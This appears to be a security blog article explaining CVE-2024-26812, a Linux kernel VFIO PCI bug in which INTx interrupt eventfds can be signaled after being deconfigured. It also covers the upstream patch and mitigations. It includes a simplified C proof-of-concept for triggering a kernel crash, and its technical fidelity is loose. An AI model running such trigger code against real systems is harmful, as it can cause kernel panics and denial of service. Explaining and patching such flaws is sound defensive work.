In early 2024, a security vulnerability was discovered in the Linux kernel’s VFIO PCI subsystem, tracked as CVE-2024-26812. The flaw affects how Virtual Function I/O (VFIO) devices handle legacy INTx interrupts: the kernel can end up signaling an eventfd that has already been deconfigured. An attacker with access to a VFIO device could use this to interact with released or unconfigured eventfds, potentially leading to crashes, information leaks, or denial-of-service. This article explains the vulnerability, provides code examples, shows how it could be exploited, and references the official patch.
## What are VFIO PCI Passthrough and INTx?
- VFIO: A Linux kernel framework allowing safe direct hardware device access to userspace (e.g., for virtual machines).
- INTx: A traditional PCI interrupt (think IRQ lines from old PCs), which VFIO delivers to userspace through eventfds.
A user space process (like QEMU) sets up a "trigger" (an eventfd) so it can be notified (or notify the kernel) when a hardware interrupt occurs. The mapping between device events and these eventfds is managed by kernel IOCTLs.
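To make the eventfd mechanism concrete, here is a minimal userspace sketch of how an eventfd counts notifications. It involves no VFIO at all, and the helper name `signal_and_read` is invented for this illustration.

```c
#include <assert.h>
#include <stdint.h>
#include <sys/eventfd.h>
#include <unistd.h>

/* Signal a fresh eventfd `times` times, then read the accumulated count.
 * Returns the count, or -1 on error (including "nothing to read"). */
static int64_t signal_and_read(int times)
{
    assert(times >= 0);

    /* Counter starts at 0; EFD_NONBLOCK makes read() fail instead of
     * blocking when the counter is still zero. */
    int efd = eventfd(0, EFD_NONBLOCK);
    if (efd < 0)
        return -1;

    uint64_t one = 1, total = 0;
    for (int i = 0; i < times; i++) {
        /* Each 8-byte write adds its value to the kernel-side counter. */
        if (write(efd, &one, sizeof(one)) != (ssize_t)sizeof(one)) {
            close(efd);
            return -1;
        }
    }

    /* In the default (non-semaphore) mode, a single read returns the
     * whole counter and resets it to zero. */
    ssize_t n = read(efd, &total, sizeof(total));
    close(efd);
    return n == (ssize_t)sizeof(total) ? (int64_t)total : -1;
}
```

With VFIO, the kernel plays the writer role when the device raises INTx, and a process such as QEMU plays the reader.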
## Vulnerability Details
The bug: VFIO PCI lets the INTx trigger eventfd be detached ("deconfigured"), which unregisters the IRQ handler. However, the INTx signaling paths remain reachable, so the trigger can still be signaled (for instance, by a misbehaving QEMU or an attacker) after it has been set to NULL. This can happen either through the VFIO_DEVICE_SET_IRQS ioctl or through the unmask irqfd while a device interrupt is pending, even though the eventfd is supposedly gone.
This is dangerous because the signaling code may then run with a NULL eventfd context, leading to a NULL pointer dereference (kernel panic) or other undefined behavior.
The challenge: synchronization. The igate mutex serializes the ioctl and config space paths, but the eventfd callbacks run in atomic context and cannot acquire a mutex, so they run asynchronously to any reconfiguration.
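The constraint above can be illustrated with a small userspace model, shown here as a sketch rather than the kernel's actual code. The types `struct trigger` and `struct intx_ctx` and both function names are hypothetical stand-ins. C11 atomics play the role of whatever non-sleeping synchronization the kernel uses. The point is that the signal path takes one snapshot of the trigger pointer and tolerates NULL instead of taking a sleeping lock.

```c
#include <assert.h>
#include <stdatomic.h>
#include <stddef.h>

/* Hypothetical stand-ins for the kernel objects; not real VFIO types. */
struct trigger { int signaled; };

struct intx_ctx {
    _Atomic(struct trigger *) trigger;   /* NULL while deconfigured */
};

/* ioctl-path model: install or remove (t == NULL) the trigger and
 * return the previous one so the caller can release it. */
static struct trigger *intx_set_trigger(struct intx_ctx *ctx, struct trigger *t)
{
    assert(ctx != NULL);
    return atomic_exchange(&ctx->trigger, t);
}

/* Signal-path model: snapshot the pointer without sleeping and skip the
 * signal when nothing is configured.
 * Returns 1 if a trigger was signaled, 0 otherwise. */
static int intx_send(struct intx_ctx *ctx)
{
    struct trigger *t = atomic_load(&ctx->trigger);
    if (t == NULL)
        return 0;
    t->signaled++;
    return 1;
}
```

This model leaves out one thing a real implementation needs: before the old trigger is freed, the updater must wait for any signal path that already holds a snapshot of it.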
## Exploit Scenario
This is a local denial-of-service (DoS) opportunity, and possibly a stepping stone toward privilege escalation. The attacker must already have privileges to control a VFIO device (usually root, or a process such as QEMU that has been handed the device). They can:
1. Register an eventfd as the INTx trigger.
2. Deconfigure (release) the eventfd, or change its value, removing its context.
3. Fire the same trigger (with a crafted ioctl or IRQ unmask), tricking the kernel into acting on a NULL pointer.
For demonstration, here’s how a malicious user process could try to trigger the bug using pseudo-C code:
```c
#include <linux/vfio.h>
#include <sys/eventfd.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

// Assume vfio_device_fd is an already opened VFIO device
// and the attacker has privileges. "/dev/vfio/XX" is a placeholder.
int main(void) {
    int vfio_device_fd = open("/dev/vfio/XX", O_RDWR);
    int efd = eventfd(0, 0);
    if (vfio_device_fd < 0 || efd < 0)
        return 1;

    // 1. Register INTx eventfd
    size_t sz = sizeof(struct vfio_irq_set) + sizeof(int);
    struct vfio_irq_set *irq_set = malloc(sz);
    if (!irq_set)
        return 1;
    irq_set->argsz = sz;
    irq_set->flags = VFIO_IRQ_SET_DATA_EVENTFD | VFIO_IRQ_SET_ACTION_TRIGGER;
    irq_set->index = VFIO_PCI_INTX_IRQ_INDEX;
    irq_set->start = 0;
    irq_set->count = 1;
    memcpy(irq_set->data, &efd, sizeof(efd));  // payload: the eventfd descriptor
    ioctl(vfio_device_fd, VFIO_DEVICE_SET_IRQS, irq_set);

    // 2. Deconfigure INTx eventfd
    irq_set->flags = VFIO_IRQ_SET_DATA_NONE | VFIO_IRQ_SET_ACTION_TRIGGER;
    ioctl(vfio_device_fd, VFIO_DEVICE_SET_IRQS, irq_set);

    // 3. Manually signal the stale eventfd
    uint64_t buf = 1;
    write(efd, &buf, sizeof(buf));
    // ... An unpatched kernel may crash or misbehave here!

    close(efd);
    close(vfio_device_fd);
    free(irq_set);
    return 0;
}
```
> Note: The above is simplified and meant for educational purposes only! Don’t run on production. Real attacks could be more reliable or sophisticated.
## The Patch: Creating a Persistent INTx Handler
The solution, posted to the kernel mailing list and then committed upstream (see References), changes the code so that:
- The INTx interrupt handler now follows the lifetime of the INTx context object, rather than the registration of a particular trigger eventfd.
- Synchronization is added between the ioctl path and the eventfd signaling path, so the trigger can be updated safely while interrupts or irqfd callbacks are in flight.
Fragment from the fix (heavily simplified)
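```c
// Control INTx context lifetime independently of eventfd registration
struct vfio_pci_intx {
    // ... other members
    spinlock_t lock;              // protects trigger
    struct eventfd_ctx *trigger;  // NULL while no eventfd is configured
};

void vfio_pci_intx_set_trigger(struct vfio_pci_intx *intx, struct eventfd_ctx *ctx)
{
    struct eventfd_ctx *old;

    // Swap the trigger under the lock; either pointer may be NULL
    spin_lock(&intx->lock);
    old = intx->trigger;
    intx->trigger = ctx;
    spin_unlock(&intx->lock);

    // Drop the old reference outside the lock, skipping NULL
    if (old)
        eventfd_ctx_put(old);
}

// In the eventfd_signal wrapper, the INTx context is always valid (until close);
// only the trigger pointer still needs a NULL check.
```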
Key Takeaway: Now, signaling a released/deconfigured eventfd will no longer reach a NULL context, and both kernel and userspace can update triggers safely.
## How to Stay Safe
- Update to a kernel that includes this fix or a backport of it. Most modern Linux distributions have already shipped it in their security updates.
- Limit VFIO device access to trusted users only.
- Use seccomp, AppArmor, or SELinux for additional containment.
## References
- Official Patch on lore.kernel.org
- Git commit fixing CVE-2024-26812
- NVD/CVE Entry for CVE-2024-26812 *(check for updates)*
## Summary
CVE-2024-26812 might seem niche, but with modern virtualization reliant on device passthrough, a kernel panic or an enlarged attack surface in VFIO is a serious concern for cloud and desktop Linux alike. The Linux community patched this promptly. If you use VFIO PCI (for example with QEMU, KVM, or SR-IOV setups), make sure your systems are updated!
Stay patched, stay safe!
## Timeline
Published on: 04/05/2024 09:15:09 UTC
Last modified on: 03/18/2025 17:04:12 UTC